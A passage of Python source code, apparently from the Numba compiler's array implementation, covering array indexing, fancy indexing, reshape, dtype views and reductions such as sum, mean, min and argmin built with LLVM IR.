dataptr = cgutils.get_item_pointer(builder, aryty, ary,
output_indices,
wraparound=False)
return (dataptr, output_shapes, output_strides)
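# For example (a sketch, not an exhaustive list): on a 2d array, `a[i, 1:n]`
# reaches this helper with an integer type and types.slice3_type and produces a
# single (shape, stride) pair, i.e. a 1d view; `a[i, j]` produces empty
# shape/stride lists, i.e. a single item location; an ellipsis stands in for
# the missing dimensions.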
def make_view(context, builder, aryty, ary, return_type,
data, shapes, strides):
"""
Build a view over the given array with the given parameters.
"""
retary = make_array(return_type)(context, builder)
populate_array(retary,
data=data,
shape=shapes,
strides=strides,
itemsize=ary.itemsize,
meminfo=ary.meminfo,
parent=ary.parent)
return retary
def _getitem_array_generic(context, builder, return_type, aryty, ary,
index_types, indices):
"""
Return the result of indexing *ary* with the given *indices*.
"""
assert isinstance(return_type, types.Buffer)
dataptr, view_shapes, view_strides = \
basic_indexing(context, builder, aryty, ary, index_types, indices)
# Build array view
retary = make_view(context, builder, aryty, ary, return_type,
dataptr, view_shapes, view_strides)
return retary._getvalue()
@builtin
@implement('getitem', types.Kind(types.Buffer), types.Kind(types.Integer))
def getitem_arraynd_intp(context, builder, sig, args):
aryty, idxty = sig.args
ary, idx = args
ary = make_array(aryty)(context, builder, ary)
dataptr, shapes, strides = \
basic_indexing(context, builder, aryty, ary, (idxty,), (idx,))
ndim = aryty.ndim
if ndim == 1:
# Return a value
assert not shapes
result = load_item(context, builder, aryty, dataptr)
elif ndim > 1:
# Return a subview over the array
out_ary = make_view(context, builder, aryty, ary, sig.return_type,
dataptr, shapes, strides)
result = out_ary._getvalue()
else:
raise NotImplementedError("1D indexing into %dD array" % aryty.ndim)
return impl_ret_borrowed(context, builder, sig.return_type, result)
@builtin
@implement('getitem', types.Kind(types.Buffer), types.slice3_type)
def getitem_array1d_slice(context, builder, sig, args):
aryty, idxty = sig.args
ary, idx = args
ary = make_array(aryty)(context, builder, value=ary)
res = _getitem_array_generic(context, builder, sig.return_type,
aryty, ary, (idxty,), (idx,))
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement('getitem', types.Kind(types.Buffer), types.Kind(types.BaseTuple))
def getitem_array_tuple(context, builder, sig, args):
aryty, tupty = sig.args
ary, tup = args
ary = make_array(aryty)(context, builder, ary)
index_types = tupty.types
indices = cgutils.unpack_tuple(builder, tup, count=len(tupty))
if any(isinstance(ty, types.Array) for ty in index_types):
return fancy_getitem(context, builder, sig, args,
aryty, ary, index_types, indices)
dataptr, shapes, strides = \
basic_indexing(context, builder, aryty, ary, index_types, indices)
ndim = aryty.ndim
if isinstance(sig.return_type, types.Array):
# Generic array slicing
res = make_view(context, builder, aryty, ary, sig.return_type,
dataptr, shapes, strides)
res = res._getvalue()
else:
# Plain indexing (returning a scalar)
assert not shapes
res = load_item(context, builder, aryty, dataptr)
    return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement('setitem', types.Kind(types.Buffer), types.Any, types.Any)
def setitem_array(context, builder, sig, args):
"""
array[a] = scalar_or_array
array[a,..,b] = scalar_or_array
"""
aryty, idxty, valty = sig.args
ary, idx, val = args
if isinstance(idxty, types.BaseTuple):
index_types = idxty.types
indices = cgutils.unpack_tuple(builder, idx, count=len(idxty))
else:
index_types = (idxty,)
indices = (idx,)
ary = make_array(aryty)(context, builder, ary)
# First try basic indexing to see if a single array location is denoted.
try:
dataptr, shapes, strides = \
basic_indexing(context, builder, aryty, ary, index_types, indices)
except NotImplementedError:
use_fancy_indexing = True
else:
use_fancy_indexing = bool(shapes)
if use_fancy_indexing:
# Index describes a non-trivial view => use generic slice assignment
# (NOTE: this also handles scalar broadcasting)
return fancy_setslice(context, builder, sig, args,
index_types, indices)
# Store source value the given location
val = context.cast(builder, val, valty, aryty.dtype)
store_item(context, builder, aryty, val, dataptr)
@builtin
@implement(types.len_type, types.Kind(types.Buffer))
def array_len(context, builder, sig, args):
(aryty,) = sig.args
(ary,) = args
arystty = make_array(aryty)
ary = arystty(context, builder, ary)
shapeary = ary.shape
res = builder.extract_value(shapeary, 0)
return impl_ret_untracked(context, builder, sig.return_type, res)
#-------------------------------------------------------------------------------
# Advanced / fancy indexing
class Indexer(object):
"""
Generic indexer interface, for generating indices over a fancy indexed
array on a single dimension.
"""
def prepare(self):
"""
Prepare the indexer by initializing any required variables, basic
blocks...
"""
raise NotImplementedError
def get_size(self):
"""
Return this dimension's size as an integer.
"""
raise NotImplementedError
def get_shape(self):
"""
Return this dimension's shape as a tuple.
"""
raise NotImplementedError
def loop_head(self):
"""
Start indexation loop. Return a (index, count) tuple.
*index* is an integer LLVM value representing the index over this
dimension.
*count* is either an integer LLVM value representing the current
iteration count, or None if this dimension should be omitted from
the indexation result.
"""
raise NotImplementedError
def loop_tail(self):
"""
Finish indexation loop.
"""
raise NotImplementedError
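# Roughly, FancyIndexer (below) drives one Indexer per dimension as follows:
#
#   for indexer in indexers: indexer.prepare()
#   indices, counts = zip(*(i.loop_head() for i in indexers))   # open nested loops
#   ... use `indices` to address the source, `counts` to address the result ...
#   for indexer in reversed(indexers): indexer.loop_tail()      # close the loops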
class EntireIndexer(Indexer):
"""
Compute indices along an entire array dimension.
"""
def __init__(self, context, builder, aryty, ary, dim):
self.context = context
self.builder = builder
self.aryty = aryty
self.ary = ary
self.dim = dim
self.ll_intp = self.context.get_value_type(types.intp)
def prepare(self):
builder = self.builder
self.size = builder.extract_value(self.ary.shape, self.dim)
self.index = cgutils.alloca_once(builder, self.ll_intp)
self.bb_start = builder.append_basic_block()
self.bb_end = builder.append_basic_block()
def get_size(self):
return self.size
def get_shape(self):
return (self.size,)
def loop_head(self):
builder = self.builder
# Initialize loop variable
self.builder.store(Constant.int(self.ll_intp, 0), self.index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_start)
cur_index = builder.load(self.index)
with builder.if_then(builder.icmp_signed('>=', cur_index, self.size),
likely=False):
builder.branch(self.bb_end)
return cur_index, cur_index
def loop_tail(self):
builder = self.builder
next_index = builder.add(builder.load(self.index),
self.context.get_constant(types.intp, 1))
builder.store(next_index, self.index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_end)
class IntegerIndexer(Indexer):
"""
Compute indices from a single integer.
"""
def __init__(self, context, builder, idx):
self.context = context
self.builder = builder
self.idx = idx
self.ll_intp = self.context.get_value_type(types.intp)
def prepare(self):
pass
def get_size(self):
return Constant.int(self.ll_intp, 1)
def get_shape(self):
return ()
def loop_head(self):
return self.idx, None
def loop_tail(self):
pass
class IntegerArrayIndexer(Indexer):
"""
Compute indices from an array of integer indices.
"""
def __init__(self, context, builder, idxty, idxary, size):
self.context = context
self.builder = builder
self.idxty = idxty
self.idxary = idxary
self.size = size
assert idxty.ndim == 1
self.ll_intp = self.context.get_value_type(types.intp)
def prepare(self):
builder = self.builder
self.idx_size = cgutils.unpack_tuple(builder, self.idxary.shape)[0]
self.idx_index = cgutils.alloca_once(builder, self.ll_intp)
self.bb_start = builder.append_basic_block()
self.bb_end = builder.append_basic_block()
def get_size(self):
return self.idx_size
def get_shape(self):
return (self.idx_size,)
def loop_head(self):
builder = self.builder
# Initialize loop variable
self.builder.store(Constant.int(self.ll_intp, 0), self.idx_index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_start)
cur_index = builder.load(self.idx_index)
with builder.if_then(builder.icmp_signed('>=', cur_index, self.idx_size),
likely=False):
builder.branch(self.bb_end)
# Load the actual index from the array of indices
index = _getitem_array1d(self.context, builder,
self.idxty, self.idxary,
cur_index, wraparound=False)
index = fix_integer_index(self.context, builder,
self.idxty.dtype, index, self.size)
return index, cur_index
def loop_tail(self):
builder = self.builder
next_index = builder.add(builder.load(self.idx_index),
Constant.int(self.ll_intp, 1))
builder.store(next_index, self.idx_index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_end)
class BooleanArrayIndexer(Indexer):
"""
Compute indices from an array of boolean predicates.
"""
def __init__(self, context, builder, idxty, idxary):
self.context = context
self.builder = builder
self.idxty = idxty
self.idxary = idxary
assert idxty.ndim == 1
self.ll_intp = self.context.get_value_type(types.intp)
self.zero = Constant.int(self.ll_intp, 0)
self.one = Constant.int(self.ll_intp, 1)
def prepare(self):
builder = self.builder
self.size = cgutils.unpack_tuple(builder, self.idxary.shape)[0]
self.idx_index = cgutils.alloca_once(builder, self.ll_intp)
self.count = cgutils.alloca_once(builder, self.ll_intp)
self.bb_start = builder.append_basic_block()
self.bb_tail = builder.append_basic_block()
self.bb_end = builder.append_basic_block()
def get_size(self):
builder = self.builder
count = cgutils.alloca_once_value(builder, self.zero)
# Sum all true values
with cgutils.for_range(builder, self.size) as loop:
c = builder.load(count)
pred = _getitem_array1d(self.context, builder,
self.idxty, self.idxary,
loop.index, wraparound=False)
c = builder.add(c, builder.zext(pred, c.type))
builder.store(c, count)
return builder.load(count)
def get_shape(self):
return (self.get_size(),)
def loop_head(self):
builder = self.builder
# Initialize loop variable
self.builder.store(self.zero, self.idx_index)
self.builder.store(self.zero, self.count)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_start)
cur_index = builder.load(self.idx_index)
cur_count = builder.load(self.count)
with builder.if_then(builder.icmp_signed('>=', cur_index, self.size),
likely=False):
builder.branch(self.bb_end)
# Load the predicate and branch if false
pred = _getitem_array1d(self.context, builder,
self.idxty, self.idxary,
cur_index, wraparound=False)
with builder.if_then(builder.not_(pred)):
builder.branch(self.bb_tail)
# Increment the count for next iteration
next_count = builder.add(cur_count, self.one)
builder.store(next_count, self.count)
return cur_index, cur_count
def loop_tail(self):
builder = self.builder
builder.branch(self.bb_tail)
builder.position_at_end(self.bb_tail)
next_index = builder.add(builder.load(self.idx_index), self.one)
builder.store(next_index, self.idx_index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_end)
class SliceIndexer(Indexer):
"""
Compute indices along a slice.
"""
def __init__(self, context, builder, aryty, ary, dim, slice):
self.context = context
self.builder = builder
self.aryty = aryty
self.ary = ary
self.dim = dim
self.slice = slice
self.ll_intp = self.context.get_value_type(types.intp)
self.zero = Constant.int(self.ll_intp, 0)
self.one = Constant.int(self.ll_intp, 1)
def prepare(self):
builder = self.builder
# Fix slice for the dimension's size
self.dim_size = builder.extract_value(self.ary.shape, self.dim)
cgutils.guard_invalid_slice(self.context, builder, self.slice)
slicing.fix_slice(builder, self.slice, self.dim_size)
self.is_step_negative = cgutils.is_neg_int(builder, self.slice.step)
# Create loop entities
self.index = cgutils.alloca_once(builder, self.ll_intp)
self.count = cgutils.alloca_once(builder, self.ll_intp)
self.bb_start = builder.append_basic_block()
self.bb_end = builder.append_basic_block()
def get_size(self):
return slicing.get_slice_length(self.builder, self.slice)
def get_shape(self):
return (self.get_size(),)
def loop_head(self):
builder = self.builder
# Initialize loop variable
self.builder.store(self.slice.start, self.index)
self.builder.store(self.zero, self.count)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_start)
cur_index = builder.load(self.index)
cur_count = builder.load(self.count)
is_finished = builder.select(self.is_step_negative,
builder.icmp_signed('<=', cur_index,
self.slice.stop),
builder.icmp_signed('>=', cur_index,
self.slice.stop))
with builder.if_then(is_finished, likely=False):
builder.branch(self.bb_end)
return cur_index, cur_count
def loop_tail(self):
builder = self.builder
next_index = builder.add(builder.load(self.index), self.slice.step)
builder.store(next_index, self.index)
next_count = builder.add(builder.load(self.count), self.one)
builder.store(next_count, self.count)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_end)
class FancyIndexer(object):
"""
Perform fancy indexing on the given array.
"""
def __init__(self, context, builder, aryty, ary, index_types, indices):
self.context = context
self.builder = builder
        self.aryty = aryty
self.shapes = cgutils.unpack_tuple(builder, ary.shape, aryty.ndim)
self.strides = cgutils.unpack_tuple(builder, ary.strides, aryty.ndim)
indexers = []
ax = 0
for indexval, idxty in zip(indices, index_types):
if idxty is types.ellipsis:
# Fill up missing dimensions at the middle
n_missing = aryty.ndim - len(indices) + 1
for i in range(n_missing):
indexer = EntireIndexer(context, builder, aryty, ary, ax)
indexers.append(indexer)
ax += 1
continue
# Regular index value
if idxty == types.slice3_type:
slice = slicing.Slice(context, builder, value=indexval)
indexer = SliceIndexer(context, builder, aryty, ary, ax, slice)
indexers.append(indexer)
elif isinstance(idxty, types.Integer):
ind = fix_integer_index(context, builder, idxty, indexval,
self.shapes[ax])
indexer = IntegerIndexer(context, builder, ind)
indexers.append(indexer)
elif isinstance(idxty, types.Array):
idxary = make_array(idxty)(context, builder, indexval)
if isinstance(idxty.dtype, types.Integer):
indexer = IntegerArrayIndexer(context, builder,
idxty, idxary,
self.shapes[ax])
elif isinstance(idxty.dtype, types.Boolean):
indexer = BooleanArrayIndexer(context, builder,
idxty, idxary)
else:
assert 0
indexers.append(indexer)
else:
raise AssertionError("unexpected index type: %s" % (idxty,))
ax += 1
# Fill up missing dimensions at the end
assert ax <= aryty.ndim, (ax, aryty.ndim)
while ax < aryty.ndim:
indexer = EntireIndexer(context, builder, aryty, ary, ax)
indexers.append(indexer)
ax += 1
assert len(indexers) == aryty.ndim, (len(indexers), aryty.ndim)
self.indexers = indexers
def prepare(self):
for i in self.indexers:
i.prepare()
def get_shape(self):
"""
Get the resulting shape as Python tuple.
"""
return sum([i.get_shape() for i in self.indexers], ())
def begin_loops(self):
indices, counts = zip(*(i.loop_head() for i in self.indexers))
return indices, counts
def end_loops(self):
for i in reversed(self.indexers):
i.loop_tail()
def fancy_getitem(context, builder, sig, args,
aryty, ary, index_types, indices):
shapes = cgutils.unpack_tuple(builder, ary.shape)
strides = cgutils.unpack_tuple(builder, ary.strides)
data = ary.data
indexer = FancyIndexer(context, builder, aryty, ary,
index_types, indices)
indexer.prepare()
# Construct output array
out_ty = sig.return_type
out_shapes = indexer.get_shape()
out = _empty_nd_impl(context, builder, out_ty, out_shapes)
out_data = out.data
out_idx = cgutils.alloca_once_value(builder,
context.get_constant(types.intp, 0))
# Loop on source and copy to destination
indices, _ = indexer.begin_loops()
# No need to check for wraparound, as the indexers all ensure
# a positive index is returned.
ptr = cgutils.get_item_pointer2(builder, data, shapes, strides,
aryty.layout, indices, wraparound=False)
val = load_item(context, builder, aryty, ptr)
# Since the destination is C-contiguous, no need for multi-dimensional
# indexing.
cur = builder.load(out_idx)
ptr = builder.gep(out_data, [cur])
store_item(context, builder, out_ty, val, ptr)
next_idx = builder.add(cur, context.get_constant(types.intp, 1))
builder.store(next_idx, out_idx)
indexer.end_loops()
return impl_ret_new_ref(context, builder, out_ty, out._getvalue())
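# At the user level this covers expressions such as `a[mask]` (boolean mask) or
# `a[idx_array]` (integer array), possibly mixed with slices and integers; the
# result is a freshly allocated C-contiguous array filled in source iteration
# order.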
@builtin
@implement('getitem', types.Kind(types.Buffer), types.Kind(types.Array))
def fancy_getitem_array(context, builder, sig, args):
aryty, idxty = sig.args
ary, idx = args
ary = make_array(aryty)(context, builder, ary)
out_ty = sig.return_type
return fancy_getitem(context, builder, sig, args,
aryty, ary, (idxty,), (idx,))
def fancy_setslice(context, builder, sig, args, index_types, indices):
"""
Implement slice assignment for arrays. This implementation works for
basic as well as fancy indexing, since there's no functional difference
between the two for indexed assignment.
"""
aryty, _, srcty = sig.args
ary, _, src = args
ary = make_array(aryty)(context, builder, ary)
dest_shapes = cgutils.unpack_tuple(builder, ary.shape)
dest_strides = cgutils.unpack_tuple(builder, ary.strides)
dest_data = ary.data
indexer = FancyIndexer(context, builder, aryty, ary,
index_types, indices)
indexer.prepare()
if isinstance(srcty, types.Buffer):
# Source is an array
src = make_array(srcty)(context, builder, src)
src_shapes = cgutils.unpack_tuple(builder, src.shape)
src_strides = cgutils.unpack_tuple(builder, src.strides)
src_data = src.data
src_dtype = srcty.dtype
# Check shapes are equal
index_shape = indexer.get_shape()
shape_error = cgutils.false_bit
assert len(index_shape) == len(src_shapes)
for u, v in zip(src_shapes, index_shape):
shape_error = builder.or_(shape_error,
builder.icmp_signed('!=', u, v))
with builder.if_then(shape_error, likely=False):
msg = "cannot assign slice from input of different size"
context.call_conv.return_user_exc(builder, ValueError, (msg,))
def src_getitem(source_indices):
assert len(source_indices) == srcty.ndim
src_ptr = cgutils.get_item_pointer2(builder, src_data,
src_shapes, src_strides,
srcty.layout, source_indices,
wraparound=False)
return load_item(context, builder, srcty, src_ptr)
else:
# Source is a scalar (broadcast or not, depending on destination
# shape).
src_dtype = srcty
def src_getitem(source_indices):
return src
# Loop on destination and copy from source to destination
dest_indices, counts = indexer.begin_loops()
# Source is iterated in natural order
source_indices = tuple(c for c in counts if c is not None)
val = src_getitem(source_indices)
    # Cast to the destination dtype (cross-dtype slice assignment is allowed)
val = context.cast(builder, val, src_dtype, aryty.dtype)
# No need to check for wraparound, as the indexers all ensure
# a positive index is returned.
dest_ptr = cgutils.get_item_pointer2(builder, dest_data,
dest_shapes, dest_strides,
aryty.layout, dest_indices,
wraparound=False)
store_item(context, builder, aryty, val, dest_ptr)
indexer.end_loops()
return context.get_dummy_value()
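# At the user level this covers assignments such as `a[1:n] = b`, `a[mask] = 0`
# or `a[idx_array] = b`: the right-hand side is either an array whose shape
# must match the indexed selection exactly (no broadcasting of non-scalar
# shapes here, see the check above), or a scalar that is stored into every
# selected location.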
#-------------------------------------------------------------------------------
# Shape / layout altering
@builtin
@implement('array.transpose', types.Kind(types.Array))
def array_transpose(context, builder, sig, args):
return array_T(context, builder, sig.args[0], args[0])
def array_T(context, builder, typ, value):
if typ.ndim <= 1:
res = value
else:
ary = make_array(typ)(context, builder, value)
ret = make_array(typ)(context, builder)
shapes = cgutils.unpack_tuple(builder, ary.shape, typ.ndim)
strides = cgutils.unpack_tuple(builder, ary.strides, typ.ndim)
populate_array(ret,
data=ary.data,
shape=cgutils.pack_array(builder, shapes[::-1]),
strides=cgutils.pack_array(builder, strides[::-1]),
itemsize=ary.itemsize,
meminfo=ary.meminfo,
parent=ary.parent)
res = ret._getvalue()
return impl_ret_borrowed(context, builder, typ, res)
builtin_attr(impl_attribute(types.Kind(types.Array), 'T')(array_T))
def _attempt_nocopy_reshape(context, builder, aryty, ary, newnd, newshape,
newstrides):
"""
Call into Numba_attempt_nocopy_reshape() for the given array type
and instance, and the specified new shape. The array pointed to
by *newstrides* will be filled up if successful.
"""
ll_intp = context.get_value_type(types.intp)
ll_intp_star = ll_intp.as_pointer()
ll_intc = context.get_value_type(types.intc)
fnty = lc.Type.function(ll_intc, [ll_intp, ll_intp_star, ll_intp_star,
ll_intp, ll_intp_star, ll_intp_star,
ll_intp, ll_intc])
fn = builder.module.get_or_insert_function(
fnty, name="numba_attempt_nocopy_reshape")
nd = lc.Constant.int(ll_intp, aryty.ndim)
shape = cgutils.gep_inbounds(builder, ary._get_ptr_by_name('shape'), 0, 0)
strides = cgutils.gep_inbounds(builder, ary._get_ptr_by_name('strides'), 0, 0)
newnd = lc.Constant.int(ll_intp, newnd)
newshape = cgutils.gep_inbounds(builder, newshape, 0, 0)
newstrides = cgutils.gep_inbounds(builder, newstrides, 0, 0)
is_f_order = lc.Constant.int(ll_intc, 0)
res = builder.call(fn, [nd, shape, strides,
newnd, newshape, newstrides,
ary.itemsize, is_f_order])
return res
@builtin
@implement('array.reshape', types.Kind(types.Array), types.Kind(types.BaseTuple))
def array_reshape(context, builder, sig, args):
aryty = sig.args[0]
retty = sig.return_type
shapety = sig.args[1]
shape = args[1]
ll_intp = context.get_value_type(types.intp)
ll_shape = lc.Type.array(ll_intp, shapety.count)
ary = make_array(aryty)(context, builder, args[0])
# XXX unknown dimension (-1) is unhandled
# Check requested size
newsize = lc.Constant.int(ll_intp, 1)
for s in cgutils.unpack_tuple(builder, shape):
newsize = builder.mul(newsize, s)
size = lc.Constant.int(ll_intp, 1)
for s in cgutils.unpack_tuple(builder, ary.shape):
size = builder.mul(size, s)
fail = builder.icmp_unsigned('!=', size, newsize)
with builder.if_then(fail):
msg = "total size of new array must be unchanged"
context.call_conv.return_user_exc(builder, ValueError, (msg,))
newnd = shapety.count
newshape = cgutils.alloca_once(builder, ll_shape)
builder.store(shape, newshape)
newstrides = cgutils.alloca_once(builder, ll_shape)
ok = _attempt_nocopy_reshape(context, builder, aryty, ary, newnd,
newshape, newstrides)
fail = builder.icmp_unsigned('==', ok, lc.Constant.int(ok.type, 0))
with builder.if_then(fail):
msg = "incompatible shape for array"
context.call_conv.return_user_exc(builder, NotImplementedError, (msg,))
ret = make_array(retty)(context, builder)
populate_array(ret,
data=ary.data,
shape=builder.load(newshape),
strides=builder.load(newstrides),
itemsize=ary.itemsize,
meminfo=ary.meminfo,
parent=ary.parent)
res = ret._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
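# A user-level sketch: inside a jitted function, `a.reshape((m, n))` succeeds
# only when the total size is unchanged and a no-copy reshape is possible for
# the array's current strides; otherwise ValueError / NotImplementedError is
# raised as above.  The unknown-dimension (-1) form is not handled here (see
# the XXX note).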
def _change_dtype(context, builder, oldty, newty, ary):
"""
Attempt to fix up *ary* for switching from *oldty* to *newty*.
See Numpy's array_descr_set()
(np/core/src/multiarray/getset.c).
Attempt to fix the array's shape and strides for a new dtype.
False is returned on failure, True on success.
"""
assert oldty.ndim == newty.ndim
assert oldty.layout == newty.layout
new_layout = ord(newty.layout)
any_layout = ord('A')
c_layout = ord('C')
f_layout = ord('F')
int8 = types.int8
def imp(nd, dims, strides, old_itemsize, new_itemsize, layout):
        # Attempt to update the layout due to a limitation of the numba
        # type system.
if layout == any_layout:
# Test rightmost stride to be contiguous
if strides[-1] == old_itemsize:
# Process this as if it is C contiguous
layout = int8(c_layout)
# Test leftmost stride to be F contiguous
elif strides[0] == old_itemsize:
# Process this as if it is F contiguous
layout = int8(f_layout)
if old_itemsize != new_itemsize and (layout == any_layout or nd == 0):
return False
if layout == c_layout:
i = nd - 1
else:
i = 0
if new_itemsize < old_itemsize:
# If it is compatible, increase the size of the dimension
# at the end (or at the front if F-contiguous)
if (old_itemsize % new_itemsize) != 0:
return False
newdim = old_itemsize // new_itemsize
dims[i] *= newdim
strides[i] = new_itemsize
elif new_itemsize > old_itemsize:
# Determine if last (or first if F-contiguous) dimension
# is compatible
bytelength = dims[i] * old_itemsize
if (bytelength % new_itemsize) != 0:
return False
dims[i] = bytelength // new_itemsize
strides[i] = new_itemsize
else:
# Same item size: nothing to do (this also works for
# non-contiguous arrays).
pass
return True
old_itemsize = context.get_constant(types.intp,
get_itemsize(context, oldty))
new_itemsize = context.get_constant(types.intp,
get_itemsize(context, newty))
nd = context.get_constant(types.intp, newty.ndim)
shape_data = cgutils.gep_inbounds(builder, ary._get_ptr_by_name('shape'),
0, 0)
strides_data = cgutils.gep_inbounds(builder,
ary._get_ptr_by_name('strides'), 0, 0)
shape_strides_array_type = types.Array(dtype=types.intp, ndim=1, layout='C')
arycls = context.make_array(shape_strides_array_type)
shape_constant = cgutils.pack_array(builder,
[context.get_constant(types.intp,
newty.ndim)])
sizeof_intp = context.get_abi_sizeof(context.get_data_type(types.intp))
sizeof_intp = context.get_constant(types.intp, sizeof_intp)
strides_constant = cgutils.pack_array(builder, [sizeof_intp])
shape_ary = arycls(context, builder)
populate_array(shape_ary,
data=shape_data,
shape=shape_constant,
strides=strides_constant,
itemsize=sizeof_intp,
meminfo=None)
strides_ary = arycls(context, builder)
populate_array(strides_ary,
data=strides_data,
shape=shape_constant,
strides=strides_constant,
itemsize=sizeof_intp,
meminfo=None)
shape = shape_ary._getvalue()
strides = strides_ary._getvalue()
args = [nd, shape, strides, old_itemsize, new_itemsize,
context.get_constant(types.int8, new_layout)]
sig = signature(types.boolean,
types.intp, # nd
shape_strides_array_type, # dims
shape_strides_array_type, # strides
types.intp, # old_itemsize
types.intp, # new_itemsize
types.int8, # layout
)
res = context.compile_internal(builder, imp, sig, args)
update_array_info(newty, ary)
res = impl_ret_borrowed(context, builder, sig.return_type, res)
return res
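# A worked example of the rules above (assuming a C-contiguous input): viewing
# an int32 array of shape (4,) as int16 doubles the last dimension to (8,) and
# sets its stride to the new itemsize; viewing it as int64 shrinks it to (2,);
# the operation fails when the dimension's byte length is not a multiple of the
# new itemsize.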
@builtin
@implement('array.view', types.Kind(types.Array), types.Kind(types.DTypeSpec))
def array_view(context, builder, sig, args):
aryty = sig.args[0]
retty = sig.return_type
ary = make_array(aryty)(context, builder, args[0])
ret = make_array(retty)(context, builder)
# Copy all fields, casting the "data" pointer appropriately
fields = set(ret._datamodel._fields)
for k in sorted(fields):
val = getattr(ary, k)
if k == 'data':
ptrty = ret.data.type
ret.data = builder.bitcast(val, ptrty)
else:
setattr(ret, k, val)
ok = _change_dtype(context, builder, aryty, retty, ret)
fail = builder.icmp_unsigned('==', ok, lc.Constant.int(ok.type, 0))
with builder.if_then(fail):
msg = "new type not compatible with array"
context.call_conv.return_user_exc(builder, ValueError, (msg,))
res = ret._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
#-------------------------------------------------------------------------------
# Computations
@builtin
@implement(numpy.sum, types.Kind(types.Array))
@implement("array.sum", types.Kind(types.Array))
def array_sum(context, builder, sig, args):
zero = sig.return_type(0)
def array_sum_impl(arr):
c = zero
for v in arr.flat:
c += v
return c
res = context.compile_internal(builder, array_sum_impl, sig, args,
locals=dict(c=sig.return_type))
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.prod, types.Kind(types.Array))
@implement("array.prod", types.Kind(types.Array))
def array_prod(context, builder, sig, args):
def array_prod_impl(arr):
c = 1
for v in arr.flat:
c *= v
return c
res = context.compile_internal(builder, array_prod_impl, sig, args,
locals=dict(c=sig.return_type))
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.cumsum, types.Kind(types.Array))
@implement("array.cumsum", types.Kind(types.Array))
def array_cumsum(context, builder, sig, args):
scalar_dtype = sig.return_type.dtype
dtype = as_dtype(scalar_dtype)
zero = scalar_dtype(0)
def array_cumsum_impl(arr):
size = 1
for i in arr.shape:
size = size * i
out = numpy.empty(size, dtype)
c = zero
for idx, v in enumerate(arr.flat):
c += v
out[idx] = c
return out
res = context.compile_internal(builder, array_cumsum_impl, sig, args,
locals=dict(c=scalar_dtype))
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.cumprod, types.Kind(types.Array))
@implement("array.cumprod", types.Kind(types.Array))
def array_cumprod(context, builder, sig, args):
scalar_dtype = sig.return_type.dtype
dtype = as_dtype(scalar_dtype)
def array_cumprod_impl(arr):
size = 1
for i in arr.shape:
size = size * i
out = numpy.empty(size, dtype)
c = 1
for idx, v in enumerate(arr.flat):
c *= v
out[idx] = c
return out
res = context.compile_internal(builder, array_cumprod_impl, sig, args,
locals=dict(c=scalar_dtype))
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.mean, types.Kind(types.Array))
@implement("array.mean", types.Kind(types.Array))
def array_mean(context, builder, sig, args):
zero = sig.return_type(0)
def array_mean_impl(arr):
# Can't use the naive `arr.sum() / arr.size`, as it would return
# a wrong result on integer sum overflow.
c = zero
for v in arr.flat:
c += v
return c / arr.size
res = context.compile_internal(builder, array_mean_impl, sig, args,
locals=dict(c=sig.return_type))
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.var, types.Kind(types.Array))
@implement("array.var", types.Kind(types.Array))
def array_var(context, builder, sig, args):
def array_var_impl(arry):
# Compute the mean
m = arry.mean()
# Compute the sum of square diffs
ssd = 0
for v in arry.flat:
ssd += (v - m) ** 2
return ssd / arry.size
res = context.compile_internal(builder, array_var_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.std, types.Kind(types.Array))
@implement("array.std", types.Kind(types.Array))
def array_std(context, builder, sig, args):
def array_std_impl(arry):
return arry.var() ** 0.5
res = context.compile_internal(builder, array_std_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.min, types.Kind(types.Array))
@implement("array.min", types.Kind(types.Array))
def array_min(context, builder, sig, args):
ty = sig.args[0].dtype
if isinstance(ty, (types.NPDatetime, types.NPTimedelta)):
# NaT is smaller than every other value, but it is
# ignored as far as min() is concerned.
nat = ty('NaT')
def array_min_impl(arry):
min_value = nat
it = arry.flat
for v in it:
if v != nat:
min_value = v
break
for v in it:
if v != nat and v < min_value:
min_value = v
return min_value
else:
def array_min_impl(arry):
for v in arry.flat:
min_value = v
break
for v in arry.flat:
if v < min_value:
min_value = v
return min_value
res = context.compile_internal(builder, array_min_impl, sig, args)
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.max, types.Kind(types.Array))
@implement("array.max", types.Kind(types.Array))
def array_max(context, builder, sig, args):
def array_max_impl(arry):
for v in arry.flat:
max_value = v
break
for v in arry.flat:
if v > max_value:
max_value = v
return max_value
res = context.compile_internal(builder, array_max_impl, sig, args)
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.argmin, types.Kind(types.Array))
@implement("array.argmin", types.Kind(types.Array))
def array_argmin(context, builder, sig, args):
ty = sig.args[0].dtype
# NOTE: Under Numpy < 1.10, argmin() is inconsistent with min() on NaT values:
# https://github.com/numpy/numpy/issues/6030
if (numpy_version >= (1, 10) and
isinstance(ty, (types.NPDatetime, types.NPTimedelta))):
# NaT is smaller than every other value, but it is
# ignored as far as argmin() is concerned.
nat = ty('NaT')
def array_argmin_impl(arry):
min_value = nat
min_idx = 0
it = arry.flat
idx = 0
for v in it:
if v != nat:
min_value = v
min_idx = idx
idx += 1
break
idx += 1
for v in it:
if v != nat and v < min_value:
min_value = v
min_idx = idx
idx += 1
return min_idx
else:
def array_argmin_impl(arry):
for v in arry.flat:
min_value = v
min_idx = 0
break
idx = 0
for v in arry.flat:
if v < min_value:
min_value = v
min_idx = idx
idx += 1
return min_idx
res = context.compile_internal(builder, array_argmin_impl, sig, args)
